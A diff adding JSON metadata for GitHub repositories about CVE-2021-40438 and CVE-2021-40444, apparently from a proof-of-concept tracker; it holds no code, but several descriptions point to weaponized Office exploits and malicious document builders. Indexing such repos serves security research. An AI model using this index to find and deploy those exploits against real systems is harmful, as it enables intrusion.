+ "created_at": "2021-10-24T10:18:08Z", + "updated_at": "2024-10-07T11:31:08Z", + "pushed_at": "2021-10-24T10:21:12Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 422182981, + "name": "CVE-2021-40438", + "full_name": "BabyTeam1024\/CVE-2021-40438", + "owner": { + "login": "BabyTeam1024", + "id": 74447452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74447452?v=4", + "html_url": "https:\/\/github.com\/BabyTeam1024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BabyTeam1024\/CVE-2021-40438", + "description": null, + "fork": false, + "created_at": "2021-10-28T11:48:12Z", + "updated_at": "2022-05-19T10:12:33Z", + "pushed_at": "2021-10-28T11:52:54Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 427124933, + "name": "apache-cve-poc", + "full_name": "ericmann\/apache-cve-poc", + "owner": { + "login": "ericmann", + "id": 605474, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/605474?v=4", + "html_url": "https:\/\/github.com\/ericmann", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ericmann\/apache-cve-poc", + "description": "Dockerized Proof-of-Concept of CVE-2021-40438 in Apache 2.4.48.", + "fork": false, + "created_at": "2021-11-11T19:51:45Z", + "updated_at": "2021-11-11T19:53:46Z", + "pushed_at": "2021-11-11T19:53:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 433314465, + "name": "Sigma-Rule-for-CVE-2021-40438-exploitation-attempt", + "full_name": "pisut4152\/Sigma-Rule-for-CVE-2021-40438-exploitation-attempt", + "owner": { + "login": "pisut4152", + "id": 72641661, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72641661?v=4", + "html_url": "https:\/\/github.com\/pisut4152", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pisut4152\/Sigma-Rule-for-CVE-2021-40438-exploitation-attempt", + "description": "Sigma-Rule-for-CVE-2021-40438-Attack-Attemp", + "fork": false, + "created_at": "2021-11-30T06:07:49Z", + "updated_at": "2021-12-03T00:25:02Z", + "pushed_at": "2021-11-30T06:08:15Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 477381613, + "name": "CVE-2021-40438", + "full_name": "Kashkovsky\/CVE-2021-40438", + "owner": { + "login": "Kashkovsky", + "id": 13631794, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13631794?v=4", + "html_url": "https:\/\/github.com\/Kashkovsky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kashkovsky\/CVE-2021-40438", + "description": "Apache forward request CVE", + "fork": false, + "created_at": "2022-04-03T15:24:24Z", + "updated_at": "2024-08-06T15:55:59Z", + "pushed_at": "2022-04-03T18:34:35Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 17, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 501852714, + "name": "CVE-2021-40438", + "full_name": "gassara-kys\/CVE-2021-40438", + "owner": { + "login": "gassara-kys", + "id": 25426601, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25426601?v=4", + "html_url": "https:\/\/github.com\/gassara-kys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gassara-kys\/CVE-2021-40438", + "description": "check CVE-2021-40438", + "fork": false, + "created_at": "2022-06-10T00:46:58Z", + "updated_at": "2024-02-01T23:15:24Z", + "pushed_at": "2022-06-10T00:56:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 730658177, + "name": "CVE-2021-40438-Apache-2.4.48-SSRF-exploit", + "full_name": "sergiovks\/CVE-2021-40438-Apache-2.4.48-SSRF-exploit", + "owner": { + "login": "sergiovks", + "id": 118485549, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118485549?v=4", + "html_url": "https:\/\/github.com\/sergiovks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sergiovks\/CVE-2021-40438-Apache-2.4.48-SSRF-exploit", + "description": "CVE-2021-40438 Apache <= 2.4.48 SSRF exploit", + "fork": false, + "created_at": "2023-12-12T11:56:23Z", + "updated_at": "2024-10-25T15:20:44Z", + "pushed_at": "2023-12-12T12:29:24Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "exploit", + "python", + "python3", + "script", + "server-side-request-forgery", + "ssrf" + ], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 802819222, + "name": "CVE-2021-40438", + "full_name": "Cappricio-Securities\/CVE-2021-40438", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2021-40438", + "description": "Apache <= 2.4.48 Mod_Proxy - Server-Side Request Forgery", + "fork": false, + "created_at": "2024-05-19T11:04:58Z", + "updated_at": "2024-06-24T07:46:24Z", + "pushed_at": "2024-06-24T07:42:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-40438", + "log4j", + "pentesting", + "vapt", + "wapt" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-4044.json b/2021/CVE-2021-4044.json new file mode 100644 index 0000000000..7a6113e385 --- /dev/null +++ b/2021/CVE-2021-4044.json @@ -0,0 +1,33 @@ +[ + { + "id": 852871814, + "name": "CVE-2021-4044", + "full_name": "phirojshah\/CVE-2021-4044", + "owner": { + "login": "phirojshah", + "id": 41940520, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41940520?v=4", + "html_url": "https:\/\/github.com\/phirojshah", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/phirojshah\/CVE-2021-4044", + "description": null, + "fork": false, + "created_at": "2024-09-05T15:15:28Z", + "updated_at": "2024-09-05T16:26:52Z", + "pushed_at": "2024-09-05T16:26:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-40444.json b/2021/CVE-2021-40444.json new file mode 100644 index 0000000000..ffcebf81a2 --- /dev/null +++ b/2021/CVE-2021-40444.json @@ -0,0 +1,1134 @@ +[ + { + "id": 404270939, + "name": "CVE-2021-40444", + "full_name": "ozergoker\/CVE-2021-40444", + "owner": { + "login": "ozergoker", + "id": 86879266, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86879266?v=4", + "html_url": "https:\/\/github.com\/ozergoker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ozergoker\/CVE-2021-40444", + "description": "Microsoft MSHTML Remote Code Execution Vulnerability CVE-2021-40444", + "fork": false, + "created_at": "2021-09-08T08:32:40Z", + "updated_at": "2024-08-12T20:16:15Z", + "pushed_at": "2021-09-29T11:39:26Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 17, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 404560139, + "name": "CVE-2021-40444", + "full_name": "DarkSprings\/CVE-2021-40444", + "owner": { + "login": "DarkSprings", + "id": 90366126, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90366126?v=4", + "html_url": "https:\/\/github.com\/DarkSprings", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DarkSprings\/CVE-2021-40444", + "description": "CVE-2021-40444 POC", + "fork": false, + "created_at": "2021-09-09T02:30:26Z", + "updated_at": "2024-07-30T16:14:36Z", + "pushed_at": "2021-09-09T02:34:39Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 6, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 404570413, + "name": "CVE-2021-40444-POC", + "full_name": "rfcxv\/CVE-2021-40444-POC", + "owner": { + "login": "rfcxv", + "id": 90367910, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90367910?v=4", + "html_url": "https:\/\/github.com\/rfcxv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rfcxv\/CVE-2021-40444-POC", + "description": null, + "fork": false, + "created_at": "2021-09-09T03:15:57Z", + "updated_at": "2024-08-12T20:16:18Z", + "pushed_at": "2021-09-09T03:26:21Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 14, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 404667016, + "name": "CVE-2021-40444_EXP_JS", + "full_name": "bambooqj\/CVE-2021-40444_EXP_JS", + "owner": { + "login": "bambooqj", + "id": 20792621, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20792621?v=4", + "html_url": "https:\/\/github.com\/bambooqj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bambooqj\/CVE-2021-40444_EXP_JS", + "description": "根据已知样本反编译代码", + "fork": false, + "created_at": "2021-09-09T09:46:00Z", + "updated_at": "2024-08-11T07:23:33Z", + "pushed_at": "2021-09-09T09:46:32Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 3, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 404779804, + "name": "cve-2021-40444-analysis", + "full_name": "Immersive-Labs-Sec\/cve-2021-40444-analysis", + "owner": { + "login": "Immersive-Labs-Sec", + "id": 79456607, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79456607?v=4", + "html_url": "https:\/\/github.com\/Immersive-Labs-Sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Immersive-Labs-Sec\/cve-2021-40444-analysis", + "description": null, + "fork": false, + "created_at": "2021-09-09T15:43:08Z", + "updated_at": "2021-09-14T08:18:40Z", + "pushed_at": "2021-09-14T08:18:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 404899720, + "name": "CVE-2021-40444", + "full_name": "vysecurity\/CVE-2021-40444", + "owner": { + "login": "vysecurity", + "id": 3596242, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3596242?v=4", + "html_url": "https:\/\/github.com\/vysecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vysecurity\/CVE-2021-40444", + "description": null, + "fork": false, + "created_at": "2021-09-09T23:41:52Z", + "updated_at": "2021-09-10T16:34:33Z", + "pushed_at": "2021-09-09T23:41:53Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 405040184, + "name": "CVE-2021-40444-Sample", + "full_name": "k4k4\/CVE-2021-40444-Sample", + "owner": { + "login": "k4k4", + "id": 23306492, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23306492?v=4", + "html_url": "https:\/\/github.com\/k4k4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k4k4\/CVE-2021-40444-Sample", + "description": "CVE-2021-40444 Sample ", + "fork": false, + "created_at": "2021-09-10T10:19:42Z", + "updated_at": "2021-09-10T10:19:43Z", + "pushed_at": "2021-09-10T09:55:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 48, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 48, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 405152543, + "name": "CVE-2021-40444", + "full_name": "lockedbyte\/CVE-2021-40444", + "owner": { + "login": "lockedbyte", + "id": 37779789, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37779789?v=4", + "html_url": "https:\/\/github.com\/lockedbyte", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lockedbyte\/CVE-2021-40444", + "description": "CVE-2021-40444 PoC", + "fork": false, + "created_at": "2021-09-10T16:55:53Z", + "updated_at": "2024-11-28T10:47:23Z", + "pushed_at": "2021-12-25T18:31:02Z", + "stargazers_count": 1600, + "watchers_count": 1600, + "has_discussions": false, + "forks_count": 483, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 483, + "watchers": 1600, + "score": 0, + "subscribers_count": 28 + }, + { + "id": 405266779, + "name": "CVE-2021-40444-docx-Generate", + "full_name": "fengjixuchui\/CVE-2021-40444-docx-Generate", + "owner": { + "login": "fengjixuchui", + "id": 2487206, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2487206?v=4", + "html_url": "https:\/\/github.com\/fengjixuchui", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fengjixuchui\/CVE-2021-40444-docx-Generate", + "description": null, + "fork": false, + "created_at": "2021-09-11T02:49:37Z", + "updated_at": "2024-08-12T20:16:20Z", + "pushed_at": "2021-09-11T02:49:31Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 405292789, + "name": "CVE-2021-40444-docx-Generate", + "full_name": "KnoooW\/CVE-2021-40444-docx-Generate", + "owner": { + "login": "KnoooW", + "id": 4646393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4646393?v=4", + "html_url": "https:\/\/github.com\/KnoooW", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/KnoooW\/CVE-2021-40444-docx-Generate", + "description": null, + "fork": false, + "created_at": "2021-09-11T05:31:52Z", + "updated_at": "2023-11-22T16:49:02Z", + "pushed_at": "2021-09-11T03:11:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 405428447, + "name": "Caboom", + "full_name": "mansk1es\/Caboom", + "owner": { + "login": "mansk1es", + "id": 74832816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74832816?v=4", + "html_url": "https:\/\/github.com\/mansk1es", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mansk1es\/Caboom", + "description": "A malicious .cab creation tool for CVE-2021-40444", + "fork": false, + "created_at": "2021-09-11T16:31:05Z", + "updated_at": "2024-01-28T23:43:55Z", + "pushed_at": "2021-09-12T09:08:23Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 405599465, + "name": "cve-2021-40444", + "full_name": "jamesrep\/cve-2021-40444", + "owner": { + "login": "jamesrep", + "id": 15976537, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15976537?v=4", + "html_url": "https:\/\/github.com\/jamesrep", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jamesrep\/cve-2021-40444", + "description": "Reverse engineering the \"A Letter Before Court 4.docx\" malicious files exploting cve-2021-40444", + "fork": false, + "created_at": "2021-09-12T09:27:40Z", + "updated_at": "2021-09-12T12:00:29Z", + "pushed_at": "2021-09-12T12:00:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 405620068, + "name": "Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx", + "full_name": "W1kyri3\/Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx", + "owner": { + "login": "W1kyri3", + "id": 81154240, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81154240?v=4", + "html_url": "https:\/\/github.com\/W1kyri3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/W1kyri3\/Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx", + "description": null, + "fork": false, + "created_at": "2021-09-12T11:12:58Z", + "updated_at": "2021-09-12T11:12:59Z", + "pushed_at": "2021-09-11T09:21:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 405716870, + "name": "CVE-2021-40444_builders", + "full_name": "aslitsecurity\/CVE-2021-40444_builders", + "owner": { + "login": "aslitsecurity", + "id": 9478055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9478055?v=4", + "html_url": "https:\/\/github.com\/aslitsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aslitsecurity\/CVE-2021-40444_builders", + "description": "This repo contain builders of cab file, html file, and docx file for CVE-2021-40444 exploit", + "fork": false, + "created_at": "2021-09-12T18:05:53Z", + "updated_at": "2024-11-06T08:14:26Z", + "pushed_at": "2021-10-11T20:53:19Z", + "stargazers_count": 172, + "watchers_count": 172, + "has_discussions": false, + "forks_count": 48, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 48, + "watchers": 172, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 405915598, + "name": "CVE-2021-40444", + "full_name": "khoaduynu\/CVE-2021-40444", + "owner": { + "login": "khoaduynu", + "id": 45584422, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45584422?v=4", + "html_url": "https:\/\/github.com\/khoaduynu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/khoaduynu\/CVE-2021-40444", + "description": "POC for CVE-2021-40444", + "fork": false, + "created_at": "2021-09-13T09:46:04Z", + "updated_at": "2021-09-13T09:46:04Z", + "pushed_at": "2021-09-13T09:46:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 406397884, + "name": "MSHTMHell", + "full_name": "Jeromeyoung\/MSHTMHell", + "owner": { + "login": "Jeromeyoung", + "id": 39945364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39945364?v=4", + "html_url": "https:\/\/github.com\/Jeromeyoung", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jeromeyoung\/MSHTMHell", + "description": "Malicious document builder for CVE-2021-40444 ", + "fork": false, + "created_at": "2021-09-14T14:20:38Z", + "updated_at": "2022-02-08T02:13:27Z", + "pushed_at": "2021-09-14T13:49:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 406457018, + "name": "CVE-2021-40444", + "full_name": "k8gege\/CVE-2021-40444", + "owner": { + "login": "k8gege", + "id": 42312878, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42312878?v=4", + "html_url": "https:\/\/github.com\/k8gege", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/k8gege\/CVE-2021-40444", + "description": null, + "fork": false, + "created_at": "2021-09-14T17:10:48Z", + "updated_at": "2024-08-12T20:16:26Z", + "pushed_at": "2021-09-14T17:19:26Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 19, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 406942491, + "name": "CVE-2021-40444", + "full_name": "klezVirus\/CVE-2021-40444", + "owner": { + "login": "klezVirus", + "id": 8959898, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8959898?v=4", + "html_url": "https:\/\/github.com\/klezVirus", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/klezVirus\/CVE-2021-40444", + "description": "CVE-2021-40444 - Fully Weaponized Microsoft Office Word RCE Exploit", + "fork": false, + "created_at": "2021-09-15T22:34:35Z", + "updated_at": "2024-11-11T02:10:31Z", + "pushed_at": "2023-10-11T18:44:51Z", + "stargazers_count": 800, + "watchers_count": 800, + "has_discussions": false, + "forks_count": 170, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "cve-2021-40444", + "msword", + "office", + "rce", + "remote-code-execution" + ], + "visibility": "public", + "forks": 170, + "watchers": 800, + "score": 0, + "subscribers_count": 18 + }, + { + "id": 407121805, + "name": "CVE-2021-40444-CAB", + "full_name": "Phuong39\/CVE-2021-40444-CAB", + "owner": { + "login": "Phuong39", + "id": 84000895, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84000895?v=4", + "html_url": "https:\/\/github.com\/Phuong39", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Phuong39\/CVE-2021-40444-CAB", + "description": "CVE-2021-40444 - Custom CAB templates from MakeCAB", + "fork": false, + "created_at": "2021-09-16T10:32:23Z", + "updated_at": "2021-09-16T10:32:24Z", + "pushed_at": "2021-09-16T10:20:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 408221589, + "name": "CVE-2021-40444--CABless", + "full_name": "Edubr2020\/CVE-2021-40444--CABless", + "owner": { + "login": "Edubr2020", + "id": 60452468, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60452468?v=4", + "html_url": "https:\/\/github.com\/Edubr2020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Edubr2020\/CVE-2021-40444--CABless", + "description": "Modified code so that we don´t need to rely on CAB archives", + "fork": false, + "created_at": "2021-09-19T19:46:28Z", + "updated_at": "2024-11-06T08:16:05Z", + "pushed_at": "2021-09-22T20:07:51Z", + "stargazers_count": 101, + "watchers_count": 101, + "has_discussions": false, + "forks_count": 22, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 22, + "watchers": 101, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 409931314, + "name": "CVE-2021-40444_CAB_archives", + "full_name": "kal1gh0st\/CVE-2021-40444_CAB_archives", + "owner": { + "login": "kal1gh0st", + "id": 56889513, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56889513?v=4", + "html_url": "https:\/\/github.com\/kal1gh0st", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kal1gh0st\/CVE-2021-40444_CAB_archives", + "description": "CVE 2021 40444 Windows Exploit services.dll", + "fork": false, + "created_at": "2021-09-24T10:59:34Z", + "updated_at": "2021-12-15T00:43:34Z", + "pushed_at": "2021-10-21T09:46:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 411631202, + "name": "Docx-Exploit-2021", + "full_name": "LazarusReborn\/Docx-Exploit-2021", + "owner": { + "login": "LazarusReborn", + "id": 89079373, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/89079373?v=4", + "html_url": "https:\/\/github.com\/LazarusReborn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LazarusReborn\/Docx-Exploit-2021", + "description": "This docx exploit uses res files inside Microsoft .docx file to execute malicious files. This exploit is related to CVE-2021-40444", + "fork": false, + "created_at": "2021-09-29T10:35:55Z", + "updated_at": "2024-10-23T16:35:59Z", + "pushed_at": "2021-09-29T10:45:43Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "botnet", + "docx", + "exploit", + "payload", + "rat", + "rce" + ], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 412946991, + "name": "CVE-2021-40444", + "full_name": "H0j3n\/CVE-2021-40444", + "owner": { + "login": "H0j3n", + "id": 51261763, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51261763?v=4", + "html_url": "https:\/\/github.com\/H0j3n", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/H0j3n\/CVE-2021-40444", + "description": null, + "fork": false, + "created_at": "2021-10-03T01:13:42Z", + "updated_at": "2024-08-12T20:16:55Z", + "pushed_at": "2021-10-10T06:32:11Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-40444" + ], + "visibility": "public", + "forks": 4, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 417517068, + "name": "MSHTML-CVE-2021-40444", + "full_name": "metehangenel\/MSHTML-CVE-2021-40444", + "owner": { + "login": "metehangenel", + "id": 31937891, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31937891?v=4", + "html_url": "https:\/\/github.com\/metehangenel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/metehangenel\/MSHTML-CVE-2021-40444", + "description": null, + "fork": false, + "created_at": "2021-10-15T13:52:34Z", + "updated_at": "2022-12-16T15:56:59Z", + "pushed_at": "2021-09-16T17:53:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 417810289, + "name": "TIC4301_Project", + "full_name": "Jeromeyoung\/TIC4301_Project", + "owner": { + "login": "Jeromeyoung", + "id": 39945364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39945364?v=4", + "html_url": "https:\/\/github.com\/Jeromeyoung", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jeromeyoung\/TIC4301_Project", + "description": "TIC4301 Project - CVE-2021-40444", + "fork": false, + "created_at": "2021-10-16T11:41:13Z", + "updated_at": "2021-10-16T11:41:14Z", + "pushed_at": "2021-10-16T08:52:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 420818304, + "name": "CVE-2021-40444", + "full_name": "tiagob0b\/CVE-2021-40444", + "owner": { + "login": "tiagob0b", + "id": 24528913, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24528913?v=4", + "html_url": 